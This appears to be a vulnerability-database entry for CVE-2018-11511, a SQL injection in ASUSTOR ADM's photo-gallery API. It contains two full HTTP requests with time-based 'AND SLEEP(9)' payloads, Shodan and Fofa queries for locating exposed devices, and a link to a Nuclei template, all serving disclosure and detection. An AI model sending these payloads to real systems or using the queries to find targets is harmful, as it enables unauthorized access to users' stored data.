| Title | ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection |
|---|---|
| Author | ritikchaddha |
| Severity | Critical |
| Impact | Unauthenticated attackers can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire ASUSTOR ADM system and accessing stored data. |
| Remediation | Upgrade to a patched version of ASUSTOR ADM or apply vendor-provided security updates. |
| CVSS Score | 9.8 |
| EPSS Score | 0.14317 |
| CVE ID | CVE-2018-11511 |
| CWE ID | CWE-89 |
| Shodan Query | http.html:"ASUSTOR" |
| Fofa Query | body="ASUSTOR" && icon_hash="1678170702" |
| Tags | cve cve2018 asustor adm sqli vkev vuln |
ASUSTOR ADM version 3.1.0.RFQ3 is vulnerable to SQL injection via the album_id parameter in the /photo-gallery/api/album/tree_lists/ endpoint. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database, potentially leading to information disclosure or further compromise of the affected system.
POST /photo-gallery/api/album/tree_lists/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
album_id=106298411+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api=v2
POST /photo-gallery/api/photo/search/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
keyword=jpg&scope=106298414+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-11511.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-11511.pcap
N/AN/A